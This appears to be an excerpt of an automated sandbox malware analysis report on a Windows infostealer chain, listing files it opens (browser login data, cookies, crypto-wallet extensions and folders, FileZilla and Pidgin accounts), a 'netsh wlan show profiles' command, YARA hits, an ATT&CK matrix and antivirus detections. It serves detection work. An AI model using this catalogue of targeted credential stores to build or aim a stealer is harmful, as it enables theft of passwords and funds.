                              Source: MPGPH131.exe, 0000001C.00000002.3251490227.0000000007CA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\ElectronCash\wallets
                              Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\com.liberty.jaxx
                              Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                              Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\wallets
                              Source: MPGPH131.exe, 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Binance\app-store.json
                              Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                              Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\MultiDoge\multidoge.wallet
                              Source: powershell.exe, 0000000B.00000002.2827936126.00007FF848E80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
                              Source: MPGPH131.exe, 0000001C.00000002.3251490227.0000000007C9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Ledger Live
                              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\formhistory.sqlite
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Login Data
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\logins.json
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_cjelfplplebdjjenllpjcblmjkfcffne_0.indexeddb.leveldb\CURRENT
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\signons.sqlite
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Login Data
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Login Data
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Login Data
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Login Data
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Login Data
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\places.sqlite
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\signons.sqlite
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Login Data
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\logins.json
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_blnieiiffboillknjnepogjhkgnoapac_0.indexeddb.leveldb\CURRENT
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeFile opened: C:\Users\user\AppData\Roaming\atomic\
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeFile opened: C:\Users\user\AppData\Roaming\atomic\
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\.purple\accounts.xml
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\System32\.purple\accounts.xml
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\.purple\accounts.xml
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\.purple\accounts.xml
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\.purple\accounts.xml
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\.purple\accounts.xml
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\ImmersiveControlPanel\.purple\accounts.xml
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\.purple\accounts.xml
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\.purple\accounts.xml
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SysWOW64\.purple\accounts.xml
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files (x86)\rjKMaHWEjHxrAXnmaImAvrxNrHOchwuelXkCKuIwTZIWy\.purple\accounts.xml
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Temp\09fd851a4f\.purple\accounts.xml
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files\Google\Chrome\Application\.purple\accounts.xml
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Temp\1000055001\.purple\accounts.xml
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Temp\4d0ab15804\.purple\accounts.xml
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Temp\1000056001\.purple\accounts.xml
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Temp\1000187001\.purple\accounts.xml
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Temp\1000188001\.purple\accounts.xml
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                              Source: 831840b410.exe, 00000010.00000003.3096661505.0000000001061000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: WIN_XP`
                              Source: 831840b410.exe, 0000002F.00000003.3472622791.000000000192C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: WIN_XP
                              Source: 831840b410.exe, 0000001F.00000003.3233691066.0000000001849000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: WIN_XPo/
                              Source: Yara match, File source: 52.0.build12.exe.3c0000.0.unpack, type: UNPACKEDPE
                              Source: Yara match, File source: 0000001D.00000002.3253650821.00000000012A1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match, File source: 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match, File source: 00000034.00000000.3328661632.00000000003C2000.00000002.00000001.01000000.00000018.sdmp, type: MEMORY
                              Source: Yara match, File source: 00000014.00000002.3272062949.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match, File source: Process Memory Space: c884f8452a.exe PID: 5596, type: MEMORYSTR
                              Source: Yara match, File source: Process Memory Space: MPGPH131.exe PID: 4012, type: MEMORYSTR
                              Source: Yara match, File source: Process Memory Space: MPGPH131.exe PID: 3436, type: MEMORYSTR
                              Source: Yara match, File source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, type: DROPPED
                              Source: Yara match, File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build12[1].exe, type: DROPPED

                              Remote Access Functionality

                              Source: Yara match, File source: dump.pcap, type: PCAP
                              Source: Yara match, File source: 52.0.build12.exe.3c0000.0.unpack, type: UNPACKEDPE
                              Source: Yara match, File source: 00000034.00000000.3328661632.00000000003C2000.00000002.00000001.01000000.00000018.sdmp, type: MEMORY
                              Source: Yara match, File source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, type: DROPPED
                              Source: Yara match, File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build12[1].exe, type: DROPPED
                              Source: Yara match, File source: Process Memory Space: c884f8452a.exe PID: 5596, type: MEMORYSTR
                              Source: Yara match, File source: Process Memory Space: MPGPH131.exe PID: 4012, type: MEMORYSTR
                              Source: Yara match, File source: Process Memory Space: MPGPH131.exe PID: 3436, type: MEMORYSTR
                              Source: Yara match, File source: Process Memory Space: c884f8452a.exe PID: 7988, type: MEMORYSTR
                              Source: Yara match, File source: Process Memory Space: RageMP131.exe PID: 1864, type: MEMORYSTR
                              Source: Yara match, File source: C:\Users\user\AppData\Local\Temp\L6h0MKsU674R9uRTEifr_26.zip, type: DROPPED
                              Source: Yara match, File source: C:\Users\user\AppData\Local\Temp\lGaQRZaI9ZBmSkbqM2Ghh6s.zip, type: DROPPED
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 221 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Disable or Modify Tools | 2 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 12 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 Native API | 11 Scheduled Task/Job | 112 Process Injection | 1 Deobfuscate/Decode Files or Information | 11 Input Capture | 2 File and Directory Discovery | Remote Desktop Protocol | 4 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 2 Command and Scripting Interpreter | 111 Registry Run Keys / Startup Folder | 11 Scheduled Task/Job | 4 Obfuscated Files or Information | 1 Credentials in Registry | 347 System Information Discovery | SMB/Windows Admin Shares | 1 Email Collection | 11 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | 11 Scheduled Task/Job | Login Hook | 111 Registry Run Keys / Startup Folder | 12 Software Packing | 1 Credentials In Files | 1071 Security Software Discovery | Distributed Component Object Model | 11 Input Capture | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Timestomp | LSA Secrets | 2 Process Discovery | SSH | Keylogging | 114 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 591 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 11 Masquerading | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 591 Virtualization/Sandbox Evasion | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 112 Process Injection | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 Rundll32 | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
                              [Behavior graph] Behavior Graph ID: 1428500; Sample: SecuriteInfo.com.Win32.Evo-...; Startdate: 19/04/2024; Architecture: WINDOWS; Score: 100

Source | Detection | Scanner | Label | Link
SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe | 54% | Virustotal | | Browse
SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe | 50% | ReversingLabs | Win32.Trojan.Znyonm |
SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe | 100% | Avira | TR/Crypt.TPM.Gen |
SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe | 100% | Avira | TR/Crypt.TPM.Gen |
C:\Users\user\AppData\Local\Temp\1000187001\build12.exe | 100% | Avira | HEUR/AGEN.1305500 |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build12[1].exe | 100% | Avira | HEUR/AGEN.1305500 |
C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe | 100% | Avira | TR/AutoIt.zstul |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\cred64[1].dll | 100% | Avira | TR/PSW.Agent.szlsq |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\amert[1].exe | 100% | Avira | TR/Crypt.TPM.Gen |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\clip64[1].dll | 100% | Avira | TR/ClipBanker.tbxxw |
C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | 100% | Avira | TR/Crypt.TPM.Gen |
C:\Users\user\AppData\Local\Temp\1000187001\build12.exe | 100% | Avira | HEUR/AGEN.1305500 |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\cred64[1].dll | 100% | Avira | TR/PSW.Agent.szlsq |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\clip64[1].dll | 100% | Avira | TR/ClipBanker.pjgxt |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe | 100% | Avira | TR/AutoIt.zstul |
C:\Users\user\AppData\Local\Temp\1000054001\amert.exe | 100% | Avira | TR/Crypt.TPM.Gen |
C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\1000187001\build12.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build12[1].exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\amert[1].exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe | 100% | Joe Sandbox ML | |
C:\ProgramData\MPGPH131\MPGPH131.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\RageMP131\RageMP131.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\1000187001\build12.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\sarra[1].exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\1000054001\amert.exe | 100% | Joe Sandbox ML | |
C:\ProgramData\MPGPH131\MPGPH131.exe | 51% | Virustotal | | Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\clip64[1].dll | 96% | ReversingLabs | Win32.Trojan.Amadey |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\clip64[1].dll | 82% | Virustotal | | Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe | 33% | Virustotal | | Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build12[1].exe | 77% | Virustotal | | Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\clip64[1].dll | 82% | ReversingLabs | Win32.Trojan.Amadey |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\clip64[1].dll | 80% | Virustotal | | Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\cred64[1].dll | 92% | ReversingLabs | Win64.Trojan.Amadey |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\cred64[1].dll | 80% | Virustotal | | Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\sarra[1].exe | 41% | Virustotal | | Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe | 51% | Virustotal | | Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\amert[1].exe | 43% | Virustotal | | Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\cred64[1].dll | 71% | ReversingLabs | Win64.Trojan.Amadey |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\cred64[1].dll | 78% | Virustotal | | Browse
C:\Users\user\AppData\Local\RageMP131\RageMP131.exe | 51% | Virustotal | | Browse
C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe | 50% | ReversingLabs | Win32.Trojan.Znyonm |
C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe | 54% | Virustotal | | Browse
